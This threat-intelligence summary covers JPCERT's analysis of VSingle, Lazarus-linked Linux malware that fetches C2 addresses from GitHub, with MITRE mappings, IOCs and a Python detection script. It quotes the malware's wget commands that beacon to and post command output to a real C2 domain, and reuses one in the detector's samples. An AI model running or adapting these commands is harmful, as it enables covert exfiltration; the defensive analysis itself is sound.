VSingle, a Lazarus-linked malware, has been updated to fetch C2 server information from GitHub instead of relying solely on hard-coded C2 endpoints. The Linux variant uses wget for C2 communication, stores responses in /tmp/.sess_* files, and dynamically discovers GitHub repositories to obtain new C2 addresses. Hashtags: #VSingle #Lazarus
Keypoints
- The Linux version of VSingle retrieves C2 server data from GitHub when its three hard-coded C2 servers are unavailable.
- Communication to the C2 uses HTTP(S), including specific GET requests to fetch C2 information from a remote server.
- The first request includes uid (hashed hostname/kernel/IP) and upw (Base64-encoded string) parameters sent to the C2.
- Command responses are saved to files under /tmp (e.g., /tmp/.sess_%08x) and the contents include AES key, IV, and command (encoded with Base64+RC4).
- The malware’s GitHub access pattern uses a dynamic raw.githubusercontent.com URL structure to obtain potential C2 endpoints.
- wget is used to execute C2 communications (unlike Windows variants that use native APIs), and results are exfiltrated via HTTP POST.
- Suggested mitigations include restricting the destinations hosts can reach and recognizing that legitimate services such as GitHub can be abused for C2 (the Appendix lists specific IOCs).
MITRE Techniques
- [T1071.001] Web Protocols – The malware uses HTTP GET/POST to retrieve C2 data (e.g., the first communication to a C2 URL). Bracket quote: "The first communication sends the following data. uid contains a hashed value of the hostname, kernel release number, and an octet of IP address combined. upw contains a Base64-encoded string of '[IP address]|30.0|12b'."
- [T1059.004] Unix Shell – The Linux variant executes shell commands, including wget, to perform network communication. Bracket quote: `wget -t 1 --server-response --no-check-certificate --user-agent=… "https://mantis.westlinks.net/api/soap/mc_enum.php?uid=…&upw=…" -O /tmp/.sess_7b00cf8e 2>&1 | awk '/^ HTTP/{print $2}'`
- [T1027] Obfuscated/Encrypted Data – The data in the saved file is Base64-encoded and the command/content is handled with Base64+RC4. Bracket quote: "The contents of the file (/tmp/.sess_%04x) in which the execution results are saved are Base64-encoded and sent via HTTP POST communication as shown below."
- [T1041] Exfiltration Over C2 Channel – Command execution results are sent via HTTP POST after being encoded/packed. Bracket quote: `wget -t 1 --server-response --no-check-certificate --post-data=… -O /tmp/.sess_7b00cf8e 2>&1 | awk '/^ HTTP/{print $2}'`
- [T1105] Ingress Tool Transfer – The malware accesses GitHub to obtain new C2 servers, indicating a download/transfer of C2 data from external sources. Bracket quote: "The malware accesses GitHub to obtain new C2 servers."
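As an added detection example (not code from the JPCERT report or from the VSingle sample), the script below classifies Linux process command lines by the traits described above: the wget invocation that writes to a hidden /tmp/.sess_<hex> file, the C2 domains listed on this page, and a upw parameter that Base64-decodes to the '[IP address]|30.0|12b' marker. The sample command lines, the IP 10.0.0.5 and the uid value are constructed for the example.

```python
import base64
import re
from urllib.parse import parse_qs, urlparse

# C2 domains named in the report's IOC list.
VSINGLE_C2_DOMAINS = {
    "mantis.westlinks.net", "www.shipshorejob.com", "crm.vncgroup.com",
    "ougreen.com", "tecnojournals.com",
}
# Shape of the wget invocation quoted in the report: certificate checks
# disabled and the response written to a hidden /tmp/.sess_<hex> file.
WGET_PATTERN = re.compile(
    r"\bwget\b.*--no-check-certificate.*-O\s+/tmp/\.sess_[0-9a-f]{4,8}\b")
# Decoded upw parameter has the form "[IP address]|30.0|12b".
UPW_MARKER = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}\|30\.0\|12b$")


def upw_matches_vsingle(upw: str) -> bool:
    """True if upw Base64-decodes to the '[IP]|30.0|12b' string."""
    try:
        decoded = base64.b64decode(upw, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):  # not Base64 / not text
        return False
    return bool(UPW_MARKER.match(decoded))


def classify_command(cmdline: str) -> list[str]:
    """Return the VSingle-style traits found in one process command line."""
    reasons = []
    if WGET_PATTERN.search(cmdline):
        reasons.append("wget-to-hidden-tmp-sess-file")
    for url in re.findall(r"https?://\S+", cmdline):
        parsed = urlparse(url.strip("\"'"))  # drop shell quoting around the URL
        if parsed.hostname in VSINGLE_C2_DOMAINS:
            reasons.append(f"known-c2-domain:{parsed.hostname}")
        if any(upw_matches_vsingle(v) for v in parse_qs(parsed.query).get("upw", [])):
            reasons.append("upw-decodes-to-vsingle-marker")
    return reasons


# Constructed sample command lines (IP 10.0.0.5 and the uid value are made up).
SAMPLE_UPW = base64.b64encode(b"10.0.0.5|30.0|12b").decode()
SAMPLE_CMDLINES = [
    'wget -t 1 --server-response --no-check-certificate --user-agent="Mozilla/5.0" '
    f'"https://mantis.westlinks.net/api/soap/mc_enum.php?uid=1a2b3c4d&upw={SAMPLE_UPW}" '
    "-O /tmp/.sess_7b00cf8e 2>&1 | awk '/^ HTTP/{print $2}'",
    "wget -q https://example.org/index.html -O /tmp/index.html",  # benign download
]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(classify_command(cmd) or "benign", "<-", cmd[:60])
```

Feed it the command-line field from auditd execve records or an EDR process log; a hit on the wget pattern alone is worth triage even when the domain is not yet on the list.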
Indicators of Compromise
- [Domain] mantis.westlinks.net – C2 endpoint domain used in GET requests to retrieve C2 data
- [Domain] www.shipshorejob.com – C2-related domain listed as a potential endpoint
- [Domain] crm.vncgroup.com – C2-related domain listed as a potential endpoint
- [Domain] ougreen.com – C2-related domain listed as a potential endpoint
- [Domain] tecnojournals.com – C2-related domain listed as a potential endpoint
- [URL] https://github.com/bgrav1ty13j/bPanda3 – GitHub repository used by attacker
- [URL] https://github.com/fwo0d17n/fWr0te – GitHub repository used by attacker
- [File name] /tmp/.sess_%08x – pattern for saved C2 response data
- [File name] /tmp/.sess_%04x – pattern for saved command output data
- [File hash] 199ba618efc6af9280c5abd86c09cdf2d475c09c8c7ffc393a35c3d70277aed1 – malware sample hash (Appendix C)
- [File hash] 2eb16dbc1097a590f07787ab285a013f5fe235287cb4fb948d4f9cce9efa5dbc – malware sample hash (Appendix C)
Read more: https://blogs.jpcert.or.jp/en/2022/07/vsingle.html